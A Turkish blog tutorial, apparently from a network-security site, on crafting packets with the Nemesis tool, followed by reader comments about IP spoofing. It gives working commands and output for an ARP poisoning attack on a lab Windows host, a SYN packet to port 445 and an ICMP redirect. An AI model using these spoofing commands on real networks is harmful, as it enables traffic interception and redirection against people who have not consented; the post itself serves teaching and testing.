Nemesis kullanarak TCP/IP Paketleri ile oynamak

pl.jpgPaket inceleme/olusturma araclari seruvenimize “Nemesis” ile devam ediyoruz. Kulaklarimda ” ya bu adamda oyuncak sandi TCP/IP’yi her gun oynuyor”  sozlerini  isitiyor gibiyim:).

Dogrudur TCP/IP ve ilgili oldugu konularda standart bilginin ustune cikmak icin devamli okumak, kurcalamak, oynamak ve bugune kadar test edilmis uygulamalari, protokolleri tekrar test etmek gerekiyor. Benim de isim bu olmasa da zevkim bu oldugu icin vakit buldukca cesitli araclarla protokoller uzerinde oynuyorum bilgimi gelistiriyorum.

Nemesis, komut satırından çalışan Linux, UNIX ve Windows türü işletim sistemlerini destekleyen TCP/IP paket oluşturma aracıdır.

İstenilen özellikte ethernet, arp, ip, icmp, igmp, tcp/udp, ospf, rip vs dns paketleri oluşturmak için kullanılabilir.

egitim ~ # nemesis
NEMESIS -=- The NEMESIS Project Version 1.4 (Build 26)

NEMESIS Usage:
nemesis [mode] [options]

NEMESIS modes:
arp
dns
ethernet
icmp
igmp
ip
ospf (currently non-functional)
rip
tcp
udp

NEMESIS options:
To display options, specify a mode with the option “help”.

Kullanımının sadece komut satırı aracılığı ile olması ilk aşamada bu aracı yeni öğrenecekler için bir dezavantaj gibi gözükse de sağladığı esnek yardım menüsü ile TCP/IP bilgisi olan herkes rahatlıkla kullanabilir. Diğer bir artısı da yazacağınız mini scriptlerle bircok ag guvenligi programinin yaptigi isleri yaptirabilirsiniz.

Nemesis Kullanarak Paket oluşturma

İlk olarak oluşturmak istediğimiz paketlerle ilgili nasıl yardım alacağımızı görelim.

Mesela X tipinde bir arp paketi oluşturmak istiyoruz fakat bunu Nemesis ile nasıl başaracağımızı ezbere bilmiyoruz.

#nemesis arp help

Komutu ile hangi tür arp paketleri oluşturulabileceği bilgisi alınır. Benzer şekilde diğer protokoller için de nemesis protokol_ismi help komutu işimize yarayacaktır.

~ # nemesis arp help,

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

ARP/RARP Usage:
arp [-v (verbose)] [options]

ARP/RARP Options:
-S-D
-h
-m
-s
-r ({ARP,RARP} REPLY enable)
-R (RARP enable)
-P

Data Link Options:
-d
-H
-M You must define a Source and Destination IP address.

ARP Paketleri Olusturmak

Ornek olarak sahte ARP paketleri ile ARP Poisoning saldırısı gerçekleştirelim

Ortam:

Gateway görevinde modem 192.168.1.1 00:13:64:22:39:3F
Masum Windows XP kullanıcısı 192.168.1.2 00-04-61-47-da-74
Nemesis ile ARP Spoof yapacak Linux kullanıcısı 192.168.1.4 00:0c:29:08:e2:48

Saldırı öncesi Windows sistemin arp tablosu.

C:\Console2>arp -a
Interface: 192.168.1.3 — 0x4
Internet Address Physical Address Type
192.168.1.1 00-13-64-22-39-3f dynamic
192.168.1.2 00-04-61-47-da-74 dynamic
192.168.1.4 00-0c-29-08-e2-48 dynamic

Nemesis ile ARP Spoof islemi.

~ # nemesis arp -d eth0 -r -v -S 192.168.1.1 -D 192.168.1.2 -h 00:0C:29:08:E2:48 -m 00:04:61:47:DA:74 -H 00:13:64:22:39:3f -M 00:04:61:47:DA:74

ARP/RARP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

[MAC] 00:13:64:22:39:3F > 00:04:61:47:DA:74
[Ethernet type] ARP (0x0806)

[Protocol addr:IP] 192.168.1.1 > 192.168.1.2
[Hardware addr:MAC] 00:0c:29:08:e2:48 > 00:04:61:47:DA:74
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0x0800)
[ARP protocol len] 6
[ARP hardware len] 4

Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB.

ARP Packet Injected

Windows makinenin ARP tablosuna tekrar bakarsak 192.168.1.1 için ARP kaydının 00:13:64:22:39:3F’dan 00:0c:29:08:e2:48’a değiştiği görülecektir.

Nemesis ile TCP Paketleri Oluşturmak

Hedef sistemin 445. portuna SYN bayraklı paket gönderelim.

# nemesis tcp -S 192.168.1.4 -D 192.168.1.3 -fS -x 21 -y 445

ICMP Paketleri Oluşturmak

Icmp redirect paketi


# nemesis icmp -v -S 192.168.1.1 -D 192.168.1.3 -G 192.168.1.4 -qRICMP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)

[IP] 192.168.1.1 > 192.168.1.3
[IP ID] 8373
[IP Proto] ICMP (1)
[IP TTL] 255
[IP TOS] 0x00
[IP Frag offset] 0x0000
[IP Frag flags]
[ICMP Type] Redirect
[ICMP Code] Redirect For Network
[ICMP Pref Gateway] 192.168.1.4

Wrote 56 byte ICMP packet.

ICMP Packet Injected

This entry was posted in Network Security, Network Tools. Bookmark the permalink.

8 Responses to Nemesis kullanarak TCP/IP Paketleri ile oynamak

  1. kenan says:

    Mrb. Ben de ağdaki yada local pcemdeki TCP paketleriyle oynama yapmak istiyorum. Ancak bunu kendi yazacağım programla yapmak istiyorum. Bu konuda detaylı makaleler yok pek, eğer yardımcı olmak isterseniz mailime gönderirseniz sevinirim.

  2. Huzeyfe ONAL says:

    Scapy’i inceleyebilirsiniz.

  3. taylan says:

    mukemmel bir bilgi. ellerinize sağlık.
    sayın hocam, affınıza sığınarak çok uzun suredir merak eetiğim bir konu hakkında soru sormak istiyorum.Bilginizi paylaşırsanız sevinirim.
    Hping ile ip spoof yapılabildiğini verdiğiniz örnekler ve açıklamar ile öğrenmiş oldum. Fakat şununu anlayamadım. Hping ile ip mi spoofladım, spoofladığım bu ip ile örnek irc sunucuna bağlanmak istiyorum veya bu ip ile whatismyip sitesine bağlanıp görmek istiyorum. Ne kullanmalıyım, ilk aklıma gelen netcat oldu fakat hping te uyarladığım ip mi netcate nasıl yorumlatıp bağlanmalıyım.

    teşekkürler.

  4. Huzeyfe ONAL says:

    IP spoofingi TCP bağlantıları için ancak bağlantı başlangıcında yapabilirsiniz. Sonrası için seq. numaralarını tahmin etmeniz, spoof ettiğiniz asıl ip adresini devre dışı bırakmanız gibi günümüz internet dünyasında pratik olarak mumkun olmayacak seyler gerekiyor.

  5. taylan says:

    1 hafta önce mynet gibi bir alanda tartışma gurplarında sohbet ederken bir user bunu yapabildi. Whois çekerek ip sini izlememi istedi.
    Gördüğüm şeye inanamadım.ondan herhangi bir dosya almadığım halde ve sisteme win live cd ile bağlandığım halde Baştan benim wan ip’im ile bana cevap yazdı.Daha sonra benim istediğim 3 farklı ipye geçti.Açıklama yapmasını istedimde bilgi vermedi.Bir haftadır bu konuyu araştırıyorum ama net bilgi bulamdım. Sanırım natcad nc_addr komutu kullanarak spoof yaptı. Hping sadece syn atack yapabiliyor, sürekli bağlantı oluşturamıyor.
    zaman ayırdığınız için teşekkürler. Yazılarınızın devamını bekliyoruz.

    saygılar

  6. Mert says:

    UDP üzerinden yapabilir ama TCP üzerinden yapamaz.

    Bağlantıyı farklı IP adresinden yapabilmesi için sıra numalarını tahmin etmesi lazım. Bu devirde sıra numarası tahmin edilebilir bir isletim sistemi kalmadı.

  7. Hakan says:

    Huzeyfe ONAL
    January 8th, 2011
    IP spoofingi TCP bağlantıları için ancak bağlantı başlangıcında yapabilirsiniz.

    Peki bunu nasıl yapabiliriz

  8. Taylan says:

    UDP uzerinden IRC serverda oturum açabilirmi,ip spoof edip yazışabilirmi ki. Bu adam bunu nasıl yapıyor cıldırdım yaf bulamadım 😀

Leave a Reply

Your email address will not be published. Required fields are marked *

fourteen − eight =